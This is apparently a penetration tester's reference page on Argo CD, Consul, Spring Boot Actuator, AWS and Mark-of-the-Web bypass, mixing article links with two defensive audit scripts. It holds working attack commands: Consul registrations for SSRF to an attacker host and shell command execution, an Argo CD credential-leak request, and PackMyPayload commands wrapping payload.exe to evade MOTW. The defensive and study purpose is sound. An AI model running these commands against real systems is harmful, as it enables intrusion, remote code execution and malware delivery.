Openstack pentest
Articles
OpenStack from a penetration tester perspective
Part 1
Part 2
Part 3
Tool
openstack-security-tool
Medium
OpenStack from a penetration tester perspective: Part 1
ArgoCD - Declarative, GitOps tool for continuous delivery on Kubernetes
Template for deploying pod and code execution within a cluster - Link
CVE-2024-31989
* Use of Risky or Missing Cryptographic Algorithms in Redis Cache (Summary & PoC)
* Redis or Not – Revealing a Critical Vulnerability in Argo CD Kubernetes Controller
CVE-2025-55190
Argo CD's Project API Token Exposes Repository Credentials
curl -sH "Authorization: Bearer $ARGOCD_API_TOKEN" \
"https://argocd.example.com/api/v1/projects/myProject/detailed"
Hardening
* Six Critical Blindspots While Securing Argo CD
* Securing Multi-Cluster ArgoCD
* Securing Continuous Delivery: Argo CD Threat Detection
GitHub
GitHub - cotsom/argocd-helloapp
Consul
SSRF
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"HTTP": "http://attackerIp:attackerPort",
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/register
RCE
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"Args": ["/bin/sh", "-c", "id"],
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/register
Agents
Get check output
curl http://consul-host:8500/v1/agent/checks | jq
Unregister agent
curl http://consul-host:8500/v1/agent/service/deregister/testservice -X PUT
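A defender-side check over the same registration body, as an added example (not from the Wallarm article or from Consul itself): it flags script checks and health checks aimed at non-loopback hosts before the body ever reaches an agent. The allowlist and the sample payloads are constructed.

```python
"""Audit a Consul service-registration body (what is PUT to
/v1/agent/service/register) for health checks that give SSRF or RCE.
Added example, not code from the Wallarm article or from Consul; the
field names follow the Consul agent API, the risk rules are this script's own."""
import ipaddress
from urllib.parse import urlsplit

# Hosts a health check may legitimately target (constructed allowlist).
ALLOWED_CHECK_HOSTS = {"localhost", "127.0.0.1", "::1"}


def _is_local(host: str) -> bool:
    if host in ALLOWED_CHECK_HOSTS:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def audit_registration(payload: dict) -> list[str]:
    """Return one finding per dangerous check in the registration body."""
    findings = []
    # The agent API accepts a single "Check" or a "Checks" list and matches
    # keys case-insensitively (the commands above use lowercase "check").
    body = {k.lower(): v for k, v in payload.items()}
    checks = list(body.get("checks") or [])
    if body.get("check"):
        checks.append(body["check"])
    for raw in checks:
        chk = {k.lower(): v for k, v in raw.items()}
        # Args/Script checks execute on the agent host: that is the RCE path.
        if "args" in chk or "script" in chk:
            findings.append(f"script check: {chk.get('args') or chk.get('script')}")
        # HTTP checks make the agent fetch a URL on the caller's behalf: SSRF.
        if "http" in chk:
            host = urlsplit(chk["http"]).hostname or ""
            if not _is_local(host):
                findings.append(f"http check to non-local host: {host}")
        # TCP checks can probe arbitrary host:port pairs the same way.
        if "tcp" in chk:
            host = chk["tcp"].rsplit(":", 1)[0].strip("[]")
            if not _is_local(host):
                findings.append(f"tcp check to non-local host: {host}")
    return findings


if __name__ == "__main__":
    # Constructed sample mirroring the script-check registration shown above.
    sample = {"ID": "testservice", "Name": "testservice", "Address": "127.0.0.1",
              "Port": 80, "check": {"Args": ["/bin/sh", "-c", "id"], "interval": "10s"}}
    for finding in audit_registration(sample):
        print("FINDING:", finding)
```

Script checks only run at all when the agent was started with enable_script_checks or enable_local_script_checks; keeping both off and putting the agent API behind ACLs with a default-deny policy closes the RCE path regardless of what a registration body contains.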
Article - Consul by HashiCorp: from Infoleak to RCE
Wallarm
Consul by HashiCorp: from Infoleak to RCE
Basically, Consul ensures the coherence of system components and the trust between them. Consul is at the core of your system.
Spring Boot Actuator
Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations
* What makes Spring Boot Actuator a treasure trove for attackers?
* Common Misconfigurations in Spring Boot Actuator
#1 Exposed HeapDump file
#2 Exposed Actuator Gateway Endpoint leading to RCE
#3 Exposed env endpoint
* How Can Organizations Defend Themselves?
Recon
* /actuator - List of all available actuator endpoints
* /actuator/mappings - All URL mappings (controllers and handlers), request → method mappings
* /actuator/beans - Shows registered Spring beans
* /actuator/configprops - Values and sources of @ConfigurationProperties
Exploitation
* /actuator/heapdump - Exposed HeapDump file
* /actuator/env - Expose details about the runtime environment
* /actuator/httptrace - Leakage of payload structures, internal URLs, possible query data
* /actuator/loggers - Shows current logging levels and (if enabled) allows you to change logger levels at runtime
* /actuator/gateway/routes - SSRF, can lead to RCE (CVE-2022-22947)
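An added audit of exposure settings (not code from the Wiz article or from Spring Boot): it parses an application.properties file and reports which of the endpoints listed above would be reachable over HTTP. It assumes Spring Boot's exclude-over-include rule and a default include set of "health" (Spring Boot 2.6+); older versions also exposed info by default.

```python
"""Work out which Actuator endpoints a Spring Boot application.properties
exposes over HTTP and flag the ones from the list above. Added example, not
from the Wiz article or Spring; exclude overrides include, "*" selects all
endpoints, and the default include set is assumed to be "health" (Boot 2.6+)."""

# Endpoint ids this audit knows about; a real app may register more.
ALL_ENDPOINTS = {"health", "info", "beans", "mappings", "configprops", "env",
                 "heapdump", "httptrace", "loggers", "gateway"}
# Why each exposed endpoint matters, taken from the exploitation list above.
RISKY = {
    "heapdump": "full JVM heap, including secrets held in memory",
    "env": "runtime environment and configuration values",
    "httptrace": "recent requests: internal URLs, headers, query data",
    "loggers": "log levels can be changed at runtime",
    "gateway": "Spring Cloud Gateway routes (CVE-2022-22947 class of issue)",
}

def parse_properties(text: str) -> dict[str, str]:
    """Minimal parser for key=value .properties content (no line continuations)."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props

def _id_set(value: str) -> set[str]:
    ids = {v.strip() for v in value.split(",") if v.strip()}
    return set(ALL_ENDPOINTS) if "*" in ids else ids

def exposed_endpoints(props: dict[str, str]) -> set[str]:
    """Endpoints reachable over the web management port for this config."""
    include = _id_set(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _id_set(props.get("management.endpoints.web.exposure.exclude", ""))
    default_on = props.get("management.endpoints.enabled-by-default", "true").lower() == "true"
    exposed = set()
    for ep in include - exclude:
        flag = props.get(f"management.endpoint.{ep}.enabled", str(default_on)).lower()
        if flag == "true":
            exposed.add(ep)
    return exposed

def risky_exposed(props: dict[str, str]) -> dict[str, str]:
    """Subset of exposed endpoints that leak data or allow runtime changes."""
    return {ep: RISKY[ep] for ep in sorted(exposed_endpoints(props)) if ep in RISKY}
```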
wiz.io
Exploring Spring Boot Actuator Misconfigurations | Wiz Blog
Misconfigurations in Spring Boot Actuator’s endpoints can leak environment variables, passwords, and API keys, and even lead to remote code execution.
AWS pwn
A collection of scripts for AWS penetration testing. Contains sets of scripts for
* Reconnaissance - Things to do with pre-compromise information gathering.
* Exploitation - Things that will help you gain a foothold in an account.
* Stealth - Things that might help you stay hidden after compromising an account.
* Exploration - Things to help you understand what you've pwned.
* Elevation - Things to help you move around an account and gather different levels of access.
* Persistence - Things to help maintain your access to an account.
* Exfiltration - Things to help you extract and move data around in AWSy ways.
GitHub
GitHub - dagrz/aws_pwn: A collection of AWS penetration testing junk
MOTW bypass
Package payloads into ISO, IMG, VHD, VHDX, ZIP, 7z, PDF, CAB for MOTW bypass
# Package a payload into an ISO that bypasses MOTW
python PackMyPayload.py payload.exe -o delivery.iso -t iso
# Package into VHD (still unpatched as of 2025+)
python PackMyPayload.py payload.exe -o delivery.vhd -t vhd
Note: As of November 2022, Microsoft patched ISO files to propagate MOTW to inner files. However, VHD/VHDX containers still bypass MOTW. Many organizations also run older Windows versions where the ISO bypass still works.
GitHub
GitHub - mgeeky/PackMyPayload: A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate…
A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats. Supports: ZIP, 7zip, PDF, ISO, IMG, CAB, VHD, V...